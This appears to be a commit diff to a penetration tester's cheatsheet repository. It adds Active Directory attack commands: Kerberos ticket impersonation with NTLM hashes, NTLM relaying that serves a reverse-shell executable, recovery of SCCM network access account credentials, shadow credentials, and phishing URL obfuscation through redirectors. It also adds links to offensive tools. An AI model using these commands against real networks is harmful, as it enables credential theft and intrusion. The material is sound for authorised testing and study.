More cheatsheets

linux/7z.md

@@ -1,6 +1,11 @@
 ### Source
 https://github.com/kornelski/7z  
 
+### Install
+```
+sudo apt install p7zip-full
+```
+
 ### Create 7 zip archive
 ```
 7z a <resultZip> <fileOrDir>

linux/bofhound.md

@@ -1,3 +1,6 @@
+### Source
+https://github.com/coffeegist/bofhound
+
 ### Install
 ```
 sudo apt-get install libffi-dev

linux/impacket-getST.md

@@ -3,7 +3,7 @@ https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/getST.
 
 ### Create service ticket using computer account and delegate ticket to impersonate user
 ```
-impacket-getST -spn cifs/<fqdnRhost> -impersonate <impersonateUser> -hashes :<ntlmHash> <domain>/<computerAccount>
+impacket-getST -self -impersonate "<targetUser>" -altservice "cifs/<fqdnComputer>" -dc-ip <domainController> '<domain>/<computerAccount$>' -hashes :<ntlmHash>
 ```
 
 ### Export ticket
@@ -13,6 +13,6 @@ export KRB5CCNAME=<impersonateUser>.ccache
 
 ### Use ticket
 ```
-impacket-wmiexec -k -no-pass <fqdnRhost>
+impacket-smbclient -k -no-pass <fqdnRhost> -dc-ip <domainController>
 ```
 

linux/impacket-getTGT.md

@@ -0,0 +1,8 @@
+### Source
+https://github.com/fortra/impacket/blob/master/examples/getTGT.py
+
+### Get TGT
+```
+getTGT.py -hashes ":<nthash>" -dc-ip <domainController> '<domain>/<user>'
+```
+

linux/impacket-mssqlclient.md

@@ -1,9 +1,9 @@
 ### Source
 https://github.com/SecureAuthCorp/impacket/blob/master/examples/mssqlclient.py  
 
-### Start mssql session
+### Start mssql session using AD authentication
 ```
-impacket-mssqlclient <user>:<password>@<rhost>
+impacket-mssqlclient -windows-auth <user>:<password>@<rhost>
 ```
 
 ### Using hashes

linux/impacket-ntlmrelayx.md

@@ -8,16 +8,22 @@ Pass-The-Hash with NET-NTLM/NTLMv1/v2 not possible
 Relaying does not work if smb signing is enabled
 ```
 
-### Relay requests to ip addresses, without -c ntlmrelayx will use secretsdump (must be in the same directory)
+### Relay requests to ip addresses, without -c ntlmrelayx will use secretsdump
 ```
 impacket-ntlmrelayx -tf <rhostFile> -c '<command>'
 ```
 
-### Serve payload, -t = target, -e payload from file - if client throws smb version-error use: -smb2support
+### Serve payload
 ```
 impacket-ntlmrelayx -t <rhost> -e <./reverse.exe>
 ```
 
+### Create socks proxy connection to relay target (socks5 using port 1080)
+```
+ntlmrelayx.py -smb2support -t smb://<rhost> -socks
+proxychains smbclient.py -no-pass <domain>/<user>@<rhost>    
+```
+
 ### Opsec considerations - 
 ```
 Windows Security Log Event IDs

linux/jq.md

@@ -11,6 +11,12 @@ cat <file>.json | jq -r '"\(.key1) ; \(.key | gsub(";"; "_"))"'
 cat <file>.json | jq -r 'if has("key1") then .key1 else .key2 end'
 ```
 
+### Use variable inside jq statement
+```
+var="content"
+echo "<json>" | jq -r --arg vari "${var}" 'select(.key == $vari) | .key2'
+```
+
 ### Print distinguishedname of bloodhound users
 ```
 cat <userFile>.json | jq '.data[].Properties.distinguishedname

linux/klist.md

@@ -0,0 +1,10 @@
+### Install
+```
+apt install krb5-user
+```
+
+### List kerberos tickets inside cache
+```
+klist
+```
+

linux/ldeep.md

@@ -0,0 +1,8 @@
+### Source
+https://github.com/franc-pentest/ldeep
+
+### Query for SCCM primary site and distribution point
+```
+ldeep ldap -u <user> -p <password> -d <domain> -s ldap://<domainController> search "(objectclass=mssmsmanagementpoint)" dnshostname,msSMSSiteCode
+```
+

linux/neo4j.md

@@ -0,0 +1,5 @@
+### Get version
+```
+call dbms.components() yield name, versions, edition unwind versions as version return name, version, edition;
+```
+

linux/proxychains.md

@@ -3,6 +3,11 @@ https://github.com/haad/proxychains
 
 ### Needs socks5 instead of socks4
 ```
-proxychains -f <file>
+proxychains -f <file> <command>
+```
+
+### Do not print socks information
+```
+proxychains -q <command>
 ```
 

linux/pywhisker.md

@@ -1,9 +1,18 @@
 ### Source
 https://github.com/ShutdownRepo/pywhisker
 
+### Troubleshooting
+```
+[!] unsupported hash type MD4
+
+pip3 uninstall cryptography
+pip3 install pycryptodome
+pip3 install cryptography
+```
+
 ### List entries of msDS-KeyCredentialLink attribute
 ```
-python3 pywhisker.py -d "<domain>" -u "<user>" -p "<password>" --target "<targetAccount>" --action "list"
+python3 pywhisker.py -d "<domain>" -u "<user>" -p "<password>" --target "<targetAccount>" -td <targetDomain> --dc-ip <domainController> --action "list"
 ```
 
 ### Add credential to the target object and write resulting certificate to file

linux/sccmhunter.md

@@ -6,13 +6,38 @@ https://github.com/garrettfoster13/sccmhunter
 python3 sccmhunter.py find -u <user> -p "<password>" -d <domain> -dc-ip <domainController>
 ```
 
-### Enumerate SMB shares and check SMB signing and MSSQL service
+### Enumerate SMB shares and check SMB signing and MSSQL service for found servers
 ```
 python3 sccmhunter.py smb -u <user> -p "<password>" -d <domain> -dc-ip <domainController>
 ```
 
-### Show accounts associated with SSCM (run after find and smb modules)
+### Show results of previous scans
 ```
-python3 sccmhunter.py show -users
+python3 sccmhunter.py show -all
+```
+
+### Possible values for show results
+```
+-siteservers
+-mps
+-users
+-computers
+-groups
+-creds
+```
+
+### Spoof standard client enrollment to recover NAA credentials (need ms-DS-MachineAccountQuota != 0)
+```
+python3 sccmhunter.py http -u <user> -p <password> -d <domain> -dc-ip <domainController> -auto
+```
+
+### Use existing machine account to recover NAA credentials
+```
+python3 sccmhunter.py http -u <user> -p <password> -d <domain> -dc-ip <domainController> -cn '<computerAccount$>' -cp <computerPassword>
+```
+
+### Request policy
+```
+python3 sccmhunter.py http -u <user> -p <password> -d <domain> -dc-ip <domainController> -mp <managmentPointRhost> -uuid <uuid>
 ```
 

linux/sed.md

@@ -43,3 +43,8 @@ echo "    some string" | sed -e 's/^[[:space:]]*//'
 sed 's/ä/ae/g; s/Ä/Ae/g; s/ö/oe/g; s/Ö/Oe/g; s/ü/ue/g; s/Ü/Ue/g; s/ß/ss/g'
 ```
 
+### Remove non printable characters
+```
+sed 's/[^[:print:]]//g' <file>
+```
+

other/phishing-url-obfuscation.md

@@ -1,6 +1,6 @@
 ### Google translate
 ```
-https://<domain>-<com>.translate.goog/?_x_tr_sl=auto&_x_tr_tl=en
+https://r1cksec-de.translate.goog/?_x_tr_sl=auto&_x_tr_tl=en
 ```
 
 ### Google with warning
@@ -13,6 +13,11 @@ https://www.google.com/url?sa=t&url=https://r1cksec.de
 https://googleweblight.com/i?u=r1cksec.de
 ```
 
+### Twitter / X
+```
+https://t.co/gVOJPP2ymM
+```
+
 ### Youtube with warning
 ```
 https://www.youtube.com/redirect?q=https%3A%2F%2Fr1cksec.de

snippet/sh/limitStringLength.sh

@@ -0,0 +1,3 @@
+string="str123456789"
+echo ${string:0:5}
+

theorie/active-directory.md

@@ -91,7 +91,7 @@ A System Access Control List describes which accesses to objects are to be logge
 The Security Account Manger is the logon name used to support clients and servers running earlier versions of windows, such as NT 4.0, 95, 98 and LAN Manager. Duplicate in database is not possible.
 
 #### SCCM
-The System Center Configuration Manager is deployment software.
+The System Center Configuration Manager is a deployment software. Since 2020 known as Microsoft Endpoint Configuration Manager (MECM)
 
 #### Security Principal 
 A user or computer account, group or process running in a security context.

url/cheatsheets.md

@@ -1,4 +1,5 @@
 * http://pinvoke.net
+* https://badfiles.ch
 * https://book.hacktricks.xyz
 * https://cheatsheetseries.owasp.org
 * https://dmcxblue.gitbook.io/red-team-notes-2-0/files/red-team-guide
@@ -66,6 +67,7 @@
 * https://github.com/milabs/awesome-linux-rootkits
 * https://github.com/MrM8BRH/Splunk
 * https://github.com/Mr-Un1k0d3r/EDRs
+* https://github.com/mthcht/awesome-lists
 * https://github.com/nebgnahz/awesome-iot-hacks
 * https://github.com/netlas-io/netlas-dorks
 * https://github.com/nullg0re/Experienced-Pentester-OSEP

url/git-tools

@@ -643,6 +643,9 @@ A Highly capable Pe Packer
 https://github.com/NUL0x4C/HellShell
 transform your payload into ipv4/ipv6/mac arrays
 
+https://github.com/NVISOsecurity/KNOCKOUT
+The tool KNOCKOUT streamlines the collection and aggregation of incident response artifacts from multiple sources, significantly saving time during critical initial access phases of Red Team exercises.
+
 https://github.com/NVISOsecurity/codasm
 Payload encoding utility to effectively lower payload entropy.
 
@@ -874,6 +877,9 @@ Email recon made fast and easy, with a framework to build on
 https://github.com/SirVer/ultisnips
 UltiSnips - The ultimate snippet solution for Vim. Send pull requests to SirVer/ultisnips!
 
+https://github.com/SkyEmie/batch-obfuscator
+Easy way to obfuscuate batch files (Windows)
+
 https://github.com/Slowerzs/ThievingFox
 ThievingFox is a collection of post-exploitation tools to gather credentials from various password managers and windows utilities.
 
@@ -967,6 +973,9 @@ S3 Account Search
 https://github.com/Wh04m1001/DFSCoerce
 PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot (found by @xct_de) methods.
 
+https://github.com/Wh1t3Rh1n0/SlackEnum
+A user enumeration tool for Slack.
+
 https://github.com/WiredPulse/Invoke-HiveNightmare
 PoC for CVE-2021-36934, which enables a standard user to be able to retrieve the SAM, Security, and Software Registry hives in Windows 10 version 1809 or newer
 
@@ -1318,6 +1327,9 @@ a c2 fully written in nim
 https://github.com/daem0nc0re/Abusing_Weak_ACL_on_Certificate_Templates
 Summary about certificate templates with weak ACL.
 
+https://github.com/daem0nc0re/PrivFu
+Kernel mode WinDbg extension and PoCs for token privilege investigation.
+
 https://github.com/daffainfo/Key-Checker
 Go scripts for checking API key / access token validity
 
@@ -1603,9 +1615,6 @@ An open-source process injection enumeration tool written in C#
 https://github.com/gildas-lormeau/SingleFile
 Web Extension and CLI tool for saving a faithful copy of an entire web page in a single HTML file
 
-https://github.com/gildas-lormeau/SingleFileZ
-Web Extension for Firefox/MS Edge and CLI tool to save a faithful copy of an entire web page in a self-extracting HTML/ZIP polyglot file
-
 https://github.com/gildas-lormeau/single-file-cli
 SingleFile can be launched from the command line by running it into a (headless) browser.
 

url/news.md

@@ -1,5 +1,4 @@
 * https://0dayfans.com
-* https://allinfosecnews.com
 * https://archlinux.org/news
 * https://blog.badsectorlabs.com
 * https://cvecrowd.com
@@ -9,6 +8,7 @@
 * https://talkback.sh
 * https://thehackernews.com
 * https://thisweekin4n6.com
+* https://www.breaches.cloud
 * https://www.golem.de/specials/security
 * https://www.ransomlook.io/recent
 * https://www.ransomware.live/#/recentvictims

url/osint.md

@@ -54,9 +54,12 @@
 * https://predictasearch.com ; #osint #email #user-profile #phone
 * https://psbdmp.ws ; #osint #storage #dumps
 * https://saucenao.com ; #osint #reverse-image-search
+* https://scam-alert.io ; #scam #crypto-wallet
+* https://scamsearch.io ; #scam-database #email #username #phone #crypto-wallet
 * https://search.censys.io ; #osint #subdomain #asn #portscan
 * https://searchcode.com ; #osint #source-code #repository
 * https://securitytrails.com ; #osint #subdomain #nameserver #portscan #dns-history #whois
+* https://spydialer.com ; #phone #email #address
 * https://spyonweb.com ; #osint #nameserver #dns-history #google-id #google-analytics #google-adsense #rootdomain
 * https://sslmate.com ; #osint #domain #subdomain #certificate
 * https://tineye.com ; #osint #reverse-image-search
@@ -81,6 +84,7 @@
 * https://www.subdomain.center ; #osint #subdomain 
 * https://www.suncalc.org ; #osint #sun #map #geolocation
 * https://www.unternehmensregister.de ; #osint #company-registry #acquisition
+* https://www.whatiswhere.com ; #points-of-interest #open-street-map
 * https://www.whoxy.com : #osint #whois #domain #rootdomain
 * https://www.xdcc.eu ; #osint #irc-search
 * https://www.zoomeye.org ; #osint #portscan #certificate #asn #rootdomain